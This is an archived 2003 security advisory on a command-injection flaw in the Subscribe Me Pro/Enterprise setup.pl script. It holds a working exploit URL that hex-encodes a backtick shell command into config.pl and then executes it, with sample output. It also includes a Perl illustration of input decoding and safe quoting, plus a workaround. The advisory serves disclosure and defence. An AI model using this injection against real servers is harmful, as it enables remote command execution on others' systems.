[UNIX] Subscribe Me Pro/Enterprise Command Execution

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

    To: list@securiteam.com
    Date: 22 Dec 2003 12:10:11 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Subscribe Me Pro/Enterprise Command Execution
    ------------------------------------------------------------------------

    SUMMARY

     Subscribe Me Pro/Enterprise (<http://www.siteinteractive.com>) is "a
    mailing list management script developed by siteinteractive". Several
    flaws in setup.pl allow an attacker to inject shell commands into
    config.pl through a backtick variable-injection flaw, and then to exploit
    a permission problem to execute config.pl.

    DETAILS

    Exploit:
    This attack tricks the perl script setup.pl into thinking that you have
    just installed Subscribe Me and wish to set it up. When doing this,
    setup.pl will attempt to write all your configuration variables to
    config.pl. Some input validation is done in setup.pl, but it can be
    easily bypassed by hex encoding all data that you send.

    Run-through of the exploit:
    First we connect and inject our exploit command of '/usr/bin/id > id' and
    tell setup.pl to create all files with a mode of 777.
    http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl
    &config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh
    &notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
    %20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

    This will return a page saying, "Please set your administration password"
    (you will not be able to).

    This has now written the following data to config.pl
    $notification = "" .`/usr/bin/id > id` . ""; (note the back ticks)

    Moreover, config.pl is now set to -rwxrwxrwx. Now we request
    http://victim.com/cgi-bin/config.pl to execute our perl.

    Accordingly, http://victim.com/cgi-bin/id is now created and contains:
    uid=48(apache) gid=48(apache) groups=48(apache)

    Using this exploit, it is possible to inject any system commands.
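    As an added illustration (not code from the advisory, and not the vendor's setup.pl), the following Perl script shows the two defensive points behind this bug: validate a CGI parameter only after URL-decoding it, and write configuration values into config.pl as escaped single-quoted literals rather than interpolating them into a double-quoted string. The function names are assumed, and the inputs are constructed from the advisory's example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Decode a CGI parameter the way the server would, THEN validate it.
# Checking the raw (still percent-encoded) value is what lets hex
# encoding slip past a filter.
sub decode_then_check {
    my ($raw) = @_;
    (my $v = $raw) =~ s/\+/ /g;
    $v =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return (undef, 'shell metacharacter in input') if $v =~ /[`\$"\\;|&<>]/;
    return ($v, undef);
}

# Vulnerable writer: the value is dropped straight into a double-quoted
# Perl literal, so a quote closes the string and backticks run a command
# when config.pl is later executed.
sub render_unsafe {
    my ($name, $value) = @_;
    return "\$$name = \"$value\";\n";
}

# Hardened writer: emit a single-quoted literal with only \ and '
# escaped; backticks, $ and " are inert inside single quotes.
sub render_safe {
    my ($name, $value) = @_;
    (my $q = $value) =~ s/([\\'])/\\$1/g;
    return "\$$name = '$q';\n";
}

# Constructed input: the advisory's notification parameter, raw and decoded.
my $raw = q{"%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`%20."};
my ($decoded, $err) = decode_then_check($raw);
print "validation: ", ($err // 'accepted'), "\n";   # rejected on the decoded value

my $payload = q{" .`/usr/bin/id > id` . "};
print "unsafe: ", render_unsafe('notification', $payload);   # reproduces the advisory's config.pl line
print "safe:   ", render_safe('notification', $payload);

# Round-trip: the hardened line compiles back to the literal text, not a command.
our $notification;
eval render_safe('notification', $payload);
die $@ if $@;
print "round-trip ok\n" if $notification eq $payload;
```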

    Vendor status:
    Company was contacted via email (support@) on Monday 15 December, they
    were notified that the exploit would be released on 19 December, and they
    were told how to fix the problem. No reply was heard back from the
    company, and no official fix has been released.

    Workaround:
    Remove setup.pl once installation is complete; in addition, chmod
    config.pl to read-only.

    ADDITIONAL INFORMATION

    This advisory is also online at:
    http://www.pimp-industries.com/advsiory-0003.txt

    The information has been provided by Paul Craig
    (headpimp@pimp-industries.com) of Pimp Industries.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

